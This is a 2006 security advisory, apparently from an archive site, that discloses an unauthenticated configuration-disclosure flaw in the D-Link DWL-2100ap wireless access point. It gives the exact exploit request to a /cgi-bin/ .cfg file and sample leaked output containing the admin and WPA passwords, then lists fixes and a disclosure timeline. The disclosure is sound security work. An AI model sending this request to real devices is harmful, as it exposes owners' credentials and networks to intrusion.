AOH :: Network Appliances

AOH :: Network Appliances :: B06-2773.HTM
D-Link Wireless Access-Point
ADVISORY - D-Link Wireless Access-Point ADVISORY - D-Link Wireless Access-Point

INTRUDERS TIGER TEAM SECURITY - SECURITY ADVISORY=0D
=0D
http://www.intruders.com.br/=0D 
http://www.intruders.org.br/=0D 
=0D
=0D
ADVISORY/0206 - D-Link Wireless Access-Point (DWL-2100ap)=0D
=0D
=0D
PRIORITY: HIGH=0D
=0D
=0D
I - INTRUDERS:=0D
----------------=0D
=0D
=0D
=0D
Intruders Tiger Team Security is a project entailed with =0D
Security Open Source (http://www.securityopensource.org.br).=0D 
=0D
The Intruders Tiger Team Security (ITTS) is a group of researchers =0D
with more than 10 years of experience, specialized in the development =0D
of intrusion projects (Pen-Test) and in special security projects.=0D
=0D
=0D
All the projects of intrusion (Pen-Test) realized until the moment by =0D
the Intruders Tiger Team Security had 100% of success.=0D
=0D
=0D
II - INTRODUCTION:=0D
------------------=0D
=0D
=0D
=0D
D-Link AirPlus XtremeG 2.4GHz Wireless Access Point, 54Mbps/108Mbps (802.11g):=0D
=0D
D-Link, the industry pioneer in wireless networking, introduces a performance =0D
breakthrough in wireless connectivity =96 D-Link AirPlus Xtreme GTM series of =0D
high-speed devices now capable of delivering transfer rates up to 15x faster =0D
than the standard 802.11b with the new D-Link 108G. With the new AirPlus Xtreme =0D
G DWL-2100AP Wireless Access Point, D-Link sets a new standard for wireless access =0D
points.=0D
=0D
D-Link DWL-2100ap is one of the most popular Access Point in the world.=0D
=0D
=0D
III - DESCRIPTION:=0D
------------------=0D
=0D
=0D
=0D
Intruders Tiger Team Security identified during an intrusion project (Pen-Test) an =0D
unknown vulnerability in the Access Point D-Link DWL-2100ap, that allows an attacker =0D
to read device's configuration, without authentication with web server.=0D
=0D
Extremely sensible informations are avaible in the configuration of the Access Point =0D
D-Link DWL-2100ap, for example:=0D
=0D
- User and password used to manage the device.=0D
- Password used in WEP and WPA.=0D
- SSID, IP, subnet mask, MAC Address filters, etc.=0D
=0D
=0D
IV - ANALISYS:=0D
---------------=0D
=0D
=0D
=0D
Making a HTTP request to the /cgi-bin/ directory, the Web server will return error 404 (Page not found).=0D
=0D
Making a HTTP request to the /cgi-bin/AnyFile.htm, the Web server will return error 404 (Page not found).=0D
=0D
However, making a HTTP request to any file in /cgi-bin/ directory, with .cfg extension, will =0D
return all the device configuration.=0D
=0D
=0D
For example, making the following request:=0D
=0D
http://dlink-DWL-2100ap/cgi-bin/Intruders.cfg=0D 
=0D
We would have a result equivalent to the following:=0D
=0D
# Copyright (c) 2002 Atheros Communications, Inc., All Rights Reserved=0D
# DO NOT EDIT -- This configuration file is automatically generated=0D
magic Ar52xxAP=0D
fwc: 34=0D
login admin=0D
DHCPServer =0D
Eth_Acl =0D
nameaddr=0D
domainsuffix =0D
IP_Addr 10.0.0.30=0D
IP_Mask 255.0.0.0=0D
Gateway_Addr 10.0.0.1=0D
RADIUSaddr =0D
RADIUSport 1812=0D
RADIUSsecret =0D
password IntrudersTest=0D
passphrase =0D
wlan1 passphrase AnewBadPassPhrase=0D
# Several lines removed.=0D
=0D
D-Link DWL-2100ap Access Point does not allow disable the Web server, not even has options to =0D
filter ports. =0D
=0D
We remember that the D-Link DWL-2100ap Access Point comes configured with default user /=0D
password (user:admin and no password).=0D
=0D
=0D
=0D
V. DETECTION:=0D
-------------=0D
=0D
=0D
=0D
Intruders Tiger Team Security confirmed the existence of this vulnerability in all firmwares =0D
tested, also the last version 2.10na. =0D
=0D
Possibly other(s) D-Link Access Point model(s) can be vulnerable also.=0D
=0D
=0D
VI. SUGESTION:=0D
--------------=0D
=0D
=0D
D-Link company:=0D
=0D
=0D
1 - Use strong cookies to guarantee that only authorized users will get access to configuration.=0D
=0D
2 - Store sensible configurations like password(s) using hash(s).=0D
=0D
3 - Allow create firewall politics and rules to filters port(s) and IP(s).=0D
=0D
4 - Request to the user change the default user/password on the first logon, and not allow =0D
    change the password to the last one used.=0D
=0D
5 - Use HTTP with SSL (HTTPS).=0D
=0D
6 - Contracts specialized companies in Pen-Test and security audit, aiming homologate the =0D
    security of D-Link products.=0D
=0D
=0D
D-Link customers:=0D
=0D
=0D
1 - Upgrade the firmware of D-Link DWL-2100ap Access Point. =0D
Direct link to download is http://www.dlinkbrasil.com.br/internet/downloads/Wireless/DWL-2100AP/DWL2100AP-firmware-v210na-r0343.tfp=0D 
=0D
=0D
VII - CHRONOLOGY:=0D
-----------------=0D
=0D
=0D
=0D
11/02/2006 - Vulnerability discovered during a Pen-Test.=0D
15/02/2006 - D-Link World Wide Team Contacted.=0D
17/02/2006 - No response.=0D
18/02/2006 - D-Link World Wide Team re-contacted.=0D
24/02/2006 - No response.=0D
25/02/2006 - D-Link World Wide Team last try of contact.=0D
29/02/2006 - No response.=0D
29/02/2006 - D-Link Brazil Team Contacted.=0D
02/03/2006 - No response.=0D
03/03/2006 - D-Link Brazil Team re-contacted.=0D
06/03/2006 - D-Link Brazil Team responsed.=0D
09/03/2006 - Patch created.=0D
14/03/2006 - Patch added to D-Link Brazil download site.=0D
06/06/2006 - published advisory.=0D
=0D
=0D
VIII - CREDITS:=0D
---------------=0D
=0D
=0D
=0D
Wendel Guglielmetti Henrique and Intruders Tiger Team Security had discovered this vulnerability.=0D
=0D
Gratefulness to Glaudson Ocampos (Intruders Tiger Team Security), Waldemar Nehgme, Jo=E3o=0D
Arquimedes (Security Open Source) and Ricardo N. Ferreira (Security Open Source).=0D
=0D
Visit our website:=0D
=0D
http://www.intruders.com.br/=0D 
http://www.intruders.org.br/=0D
The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better). Site design & layout copyright © 1986-2009 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.